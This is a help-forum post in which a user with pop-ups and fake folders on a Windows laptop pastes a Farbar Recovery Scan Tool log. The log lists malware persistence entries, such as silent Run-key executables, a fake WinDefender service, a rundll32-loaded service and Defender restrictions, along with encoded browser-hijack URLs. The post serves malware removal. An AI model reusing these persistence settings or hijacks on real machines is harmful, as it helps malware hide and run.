[RESOLVED] IE keeps popping and fake folders on drive C:\

  1. #1

    Hello masters!

    I've run a free Total AV quick and full scan and it resolved at least 30 threats. But upon restart, there are fake folders popping up on C:\ and IE keeps popping up like crazy. Please help me clean my laptop. Here are the logs:

    FRST

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 6.02.2019
    Ran by Thomazing! (administrator) on DESKTOP-OHFLJFD (09-02-2019 00:59:59)
    Running from C:\Users\Thomazing!\Downloads
    Loaded Profiles: Thomazing! (Available Profiles: Thomazing!)
    Platform: Windows 10 Pro 10240.16487 (X64) Language: English (United States)
    Default browser: IE
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic...ery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    () C:\ProgramData\Logic Cramble\set.exe
    (Google Inc.) C:\ProgramData\localNETService\localNETService.exe
    (Microsoft Corporation) C:\Windows\System32\rundll32.exe
    (TotalAV) C:\Program Files (x86)\TotalAV\SecurityService.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
    (Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
    (Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
    (J4K6ZYTM) C:\Program Files (x86)\0qfoy55me3i\ESDJ37B9ITN0QK9.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
    (Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
    (Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
    () C:\Program Files (x86)\Multitimer\Multitimer.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\System32\cmd.exe
    (J4K6ZYTM) C:\Program Files\OTIZAMD5IS\8LD0IPFQC.exe
    ( ) C:\Users\Thomazing!\AppData\Roaming\mo24n4005vt\i2z4dmklduc.exe
    () C:\Users\Thomazing!\AppData\Local\Temp\is-UBPC7.tmp\i2z4dmklduc.tmp
    (TotalAV) C:\Program Files (x86)\TotalAV\TotalAV.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
    (Internet Download Manager, Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\idmBroker.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16464_none_116100d161f6ab1d\TiWorker.exe

    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM-x32\...\Run: [Multitimer] => C:\Program Files (x86)\Multitimer\Multitimer.exe [281600 2017-12-12] () <==== ATTENTION
    HKLM-x32\...\Run: [DiskPower] => "C:\Program Files (x86)\DiskWMpower\DiskPower.exe"
    HKLM-x32\...\Run: [chrome] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1708016 2019-02-06] (Google LLC -> Google Inc.)
    HKLM\...\RunOnce: [OMEWPRODUCT_7FCEM] => C:\Program Files (x86)\0qfoy55me3i\ESDJ37B9ITN0QK9.exe [236032 2019-02-08] (J4K6ZYTM) <==== ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [8222286] => "C:\Users\Thomazing!\AppData\Roaming\p542dcem2lr\iastcgr31fm.exe" /VERYSILENT
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [WK27HXJEIFMX6EE] => "C:\Program Files\200OTU5ILR\200OTU5IL.exe"
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3948600 2016-06-10] (Tonec Inc.)
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [8735117] => "C:\Users\Thomazing!\AppData\Roaming\dwdqael1vpm\ncu5cze5p50.exe" /VERYSILENT
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [T9KTUNJFV82076N] => "C:\Program Files\1TH7OLWWNG\1TH7OLWWN.exe"
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [CloudNet] => C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-02-08] (EpicNet Inc.) <==== ATTENTION
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [9428290] => "C:\Users\Thomazing!\AppData\Roaming\htpaossc1dy\ubd1dkxuekl.exe" /VERYSILENT
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [U943W0QT19CB97H] => "C:\Program Files\J7CMVSXGZX\J7CMVSXGZ.exe"
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [3525589] => "C:\Users\Thomazing!\AppData\Roaming\fsmysd5hgd4\bqedsdhpytd.exe" /VERYSILENT
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [URD8WCW2ZCRHWKK] => "C:\Program Files\RQIX2K7UEC\RQIX2K7UE.exe"
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [NNHJYS7S607ZBCR] => "C:\Program Files\0JJM5TTRFB\IBKXK5Q0P.exe"
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [9236653] => "C:\Users\Thomazing!\AppData\Roaming\b2mkkcpioce\zrxkioireze.exe" /VERYSILENT
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [19645800 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [8581968] => "C:\Users\Thomazing!\AppData\Roaming\wlzey0ugdb2\lihriqawtkv.exe" /VERYSILENT
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [44K3AH7DLU628F4] => "C:\Program Files\E1WSWX87LG\BIX8CZGTD.exe"
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [H82B1SB6W40C6YU] => C:\Program Files\OTIZAMD5IS\8LD0IPFQC.exe [850944 2019-02-09] (J4K6ZYTM)
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [5608956] => C:\Users\Thomazing!\AppData\Roaming\mo24n4005vt\i2z4dmklduc.exe [1277549 2019-02-09] ( )
    HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\Installer\chrmstp.exe [2019-02-08] (Google LLC -> Google Inc.)
    HKLM\Software\...\Authentication\Credential Providers: [{8AF662BF-65A0-4D0A-A540-A338A999D36F}] -> C:\Windows\system32\FaceCredentialProvider.dll [2015-09-10] (Microsoft Windows -> )
    HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] -> C:\Windows\system32\FaceCredentialProvider.dll [2015-09-10] (Microsoft Windows -> )
    GroupPolicy: Restriction ? <==== ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 192.168.43.1
    Tcpip\..\Interfaces\{162dea71-3191-454f-8a8b-be0d312e54a5}: [DhcpNameServer] 192.168.43.1

    Internet Explorer:
    ==================
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-oCfgyL8lTV3FXzedUhRdT0Tk-a20qstFrzGkWt88Enx1zCRT8c4ZVOM3Ou-CJLbMqrt96pQNSQhDy8Im_06irGC1H_&q={searchTerms}
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-bFEwE5S0xnXgWxUsARdsrsiNM_BcRR6VIUgHwYSXwHh7Ffv8ygm0uKm7dXNxCM7Ay7BGUULgFL93oS9c_xJL13HFJx
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-oCfgyL8lTV3FXzedUhRdT0Tk-a20qstFrzGkWt88Enx1zCRT8c4ZVOM3Ou-CJLbMqrt96pQNSQhDy8Im_06irGC1H_&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3408261874-2140888000-2142219774-1001 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-oCfgyL8lTV3FXzedUhRdT0Tk-a20qstFrzGkWt88Enx1zCRT8c4ZVOM3Ou-CJLbMqrt96pQNSQhDy8Im_06irGC1H_&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3408261874-2140888000-2142219774-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-oCfgyL8lTV3FXzedUhRdT0Tk-a20qstFrzGkWt88Enx1zCRT8c4ZVOM3Ou-CJLbMqrt96pQNSQhDy8Im_06irGC1H_&q={searchTerms}
    BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2015-12-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
    BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2019-02-08] (Google Inc -> Google Inc.)
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
    BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2015-12-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
    BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2019-02-08] (Google Inc -> Google Inc.)
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
    Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2019-02-08] (Google Inc -> Google Inc.)
    Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2019-02-08] (Google Inc -> Google Inc.)

    FireFox:
    ========
    FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5
    FF Extension: (IDM CC) - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5 [2019-02-09] [Legacy] [not signed]
    FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
    FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2016-06-08] [Legacy]
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-08] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-08] (Google Inc.)

    Chrome:
    =======
    CHR DefaultSearchURL: Default -> hxxps://feed.bazzsearch.com/?fext=true&publisherid=51206&publisher=defaultbazz&st=ed&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> Bazz Search
    CHR Profile: C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default [2019-02-09]
    CHR Extension: (Slides) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-08]
    CHR Extension: (Docs) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-08]
    CHR Extension: (Google Drive) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-08]
    CHR Extension: (chrome_filter) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\begnkeifkeikfcimaaddacpiojbnagko [2019-02-08]
    CHR Extension: (YouTube) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-08]
    CHR Extension: (Flower Power) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\dpapfcgjbomdehpglobkahgbbfamomgo [2019-02-09]
    CHR Extension: (Sheets) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-08]
    CHR Extension: (Google Docs Offline) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-08]
    CHR Extension: (IDM Integration Module) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-09]
    CHR Extension: (Bazz Search) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2019-02-09]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-08]
    CHR Extension: (Gmail) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-02-08]
    CHR Extension: (Chrome Media Router) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-08]
    CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-06-10]
    CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-06-10]

    ==================== Services (Whitelisted) ====================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2019-02-07] () [File not signed] <==== ATTENTION
    R2 localNETService; C:\ProgramData\localNETService\localNETService.exe [1905784 2019-02-08] (CONVERSION MAGIC LTD -> Google Inc.)
    R2 SecurityService; C:\Program Files (x86)\TotalAV\SecurityService.exe [4429264 2018-12-06] (Protected Antivirus Limited -> TotalAV)
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation -> Microsoft Corporation)
    R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation -> Microsoft Corporation)
    R2 WinDefender; C:\Windows\windefender.exe [0 ] (CreateFileW function failed -> ) <==== ATTENTION (zero byte File/Folder)
    R2 NWQxNTAzNz; rundll32.exe C:\Windows\bxetfbicyncsflqei.bxetf IQQV [X]

    ===================== Drivers (Whitelisted) ======================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R1 B62CD2D3FFB1; C:\Windows\B62CD2D3FFB1.sys [621928 2019-02-08] (韵羽健康管理咨询(上海)有限公司 -> VxDriver)
    S3 bcmfn2; C:\Windows\System32\drivers\bcmfn2.sys [17624 2015-06-18] (Broadcom Corporation -> Windows (R) Win 7 DDK provider)
    R3 FwLnk; C:\Windows\System32\drivers\FwLnk.sys [17920 2019-02-08] (Microsoft Windows Hardware Compatibility Publisher -> TOSHIBA Corporation)
    S3 iaLPSSi_GPIO; C:\Windows\System32\drivers\iaLPSSi_GPIO.sys [38128 2015-06-18] (Intel Corporation - Client Components Group -> Intel Corporation)
    S3 iaLPSSi_I2C; C:\Windows\System32\drivers\iaLPSSi_I2C.sys [122608 2015-06-18] (Intel Corporation - Client Components Group -> Intel Corporation)
    R3 igfx; C:\Windows\system32\DRIVERS\igdkmd64.sys [10627744 2019-02-08] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
    S0 nvraid; C:\Windows\System32\drivers\nvraid.sys [150368 2015-07-10] (Microsoft Windows -> NVIDIA Corporation)
    S0 nvstor; C:\Windows\System32\drivers\nvstor.sys [166240 2015-07-10] (Microsoft Windows -> NVIDIA Corporation)
    R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-18] (Microsoft Windows -> Realtek )
    R3 RTL8187B; C:\Windows\System32\drivers\rtl8187B.sys [459336 2015-06-18] (Realtek Semiconductor Corp -> Realtek Semiconductor Corporation )
    S0 SiSRaid2; C:\Windows\System32\drivers\SiSRaid2.sys [44896 2015-07-10] (Microsoft Windows -> Silicon Integrated Systems Corp.)
    S0 SiSRaid4; C:\Windows\System32\drivers\sisraid4.sys [81760 2015-07-10] (Microsoft Windows -> Silicon Integrated Systems)
    R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [45720 2019-02-08] (TOSHIBA CORPORATION -> Toshiba Corporation)
    S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
    S3 WDC_SAM; C:\Windows\System32\drivers\wdcsam64.sys [35584 2019-02-08] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.)
    R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Windows -> Microsoft Corporation)
    S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Windows -> Microsoft Corporation)
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] (WDKTestCert Admin,131480495282941941 -> ) <==== ATTENTION (zero byte File/Folder)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-02-08] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
    S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One month (created) ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2019-02-09 13:22 - 2019-02-09 00:52 - 000875126 _____ C:\Windows\system32\PerfStringBackup.INI
    2019-02-09 13:21 - 2019-02-09 13:21 - 000002353 _____ C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
    2019-02-09 13:21 - 2019-02-09 13:21 - 000000000 ___RD C:\Users\Thomazing!\OneDrive
    2019-02-09 13:20 - 2019-02-09 13:20 - 000000000 ____D C:\Windows\CSC
    2019-02-09 13:19 - 2019-02-09 13:19 - 000016148 _____ C:\Windows\system32\DESKTOP-OHFLJFD_defaultuser0_HistoryPrediction.bin
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000020 ___SH C:\Users\Thomazing!\ntuser.ini
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Adobe
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\VirtualStore
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\TileDataLayer
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Publishers
    2019-02-09 13:19 - 2019-02-08 22:22 - 000000000 ____D C:\Users\Thomazing!
    2019-02-09 13:19 - 2019-02-08 21:38 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Packages
    2019-02-09 13:15 - 2019-02-09 13:15 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
    2019-02-09 13:14 - 2019-02-08 23:05 - 000000000 ____D C:\Windows\Panther
    2019-02-09 00:59 - 2019-02-09 01:01 - 000020986 _____ C:\Users\Thomazing!\Downloads\FRST.txt
    2019-02-09 00:59 - 2019-02-09 00:59 - 000000000 ____D C:\FRST
    2019-02-09 00:58 - 2019-02-09 00:59 - 002433536 _____ (Farbar) C:\Users\Thomazing!\Downloads\FRST64.exe
    2019-02-09 00:43 - 2019-02-09 00:44 - 000000000 ____D C:\Program Files\OTIZAMD5IS
    2019-02-09 00:43 - 2019-02-09 00:43 - 000016148 _____ C:\Windows\system32\DESKTOP-OHFLJFD_Thomazing!_HistoryPrediction.bin
    2019-02-09 00:43 - 2019-02-09 00:43 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\mo24n4005vt
    2019-02-09 00:30 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\wlzey0ugdb2
    2019-02-08 23:57 - 2019-02-08 23:57 - 000000000 ____D C:\ProgramData\TechSmith
    2019-02-08 23:56 - 2019-02-08 23:58 - 000000000 ____D C:\Users\Thomazing!\Documents\Snagit
    2019-02-08 23:56 - 2019-02-08 23:56 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\TechSmith
    2019-02-08 23:55 - 2019-02-08 23:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Snagit12
    2019-02-08 23:55 - 2019-02-08 23:55 - 000000000 ____D C:\Program Files (x86)\Snagit12
    2019-02-08 23:11 - 2019-02-08 23:11 - 000000000 ____D C:\Users\Thomazing!\Documents\TotalAV
    2019-02-08 23:10 - 2019-02-08 23:10 - 000000000 ____D C:\ProgramData\SecuritySuite
    2019-02-08 23:09 - 2019-02-09 00:44 - 000000000 ____D C:\Program Files (x86)\TotalAV
    2019-02-08 23:09 - 2019-02-08 23:09 - 000001089 _____ C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TotalAV.lnk
    2019-02-08 23:09 - 2019-02-08 23:09 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\TotalAV
    2019-02-08 23:02 - 2019-02-09 00:30 - 000000000 ____D C:\Program Files\CCleaner
    2019-02-08 23:02 - 2019-02-08 23:02 - 000003936 _____ C:\Windows\System32\Tasks\CCleaner Update
    2019-02-08 23:02 - 2019-02-08 23:02 - 000002898 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
    2019-02-08 23:02 - 2019-02-08 23:02 - 000002377 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2019-02-08 23:02 - 2019-02-08 23:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
    2019-02-08 23:01 - 2019-02-08 23:01 - 000000000 ____D C:\Program Files\Google
    2019-02-08 23:00 - 2019-02-08 23:07 - 000003418 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
    2019-02-08 23:00 - 2019-02-08 23:07 - 000003294 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
    2019-02-08 23:00 - 2019-02-08 23:01 - 000000000 ____D C:\ProgramData\Google
    2019-02-08 22:58 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\b2mkkcpioce
    2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files\Reference Assemblies
    2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files\MSBuild
    2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files (x86)\Reference Assemblies
    2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files (x86)\MSBuild
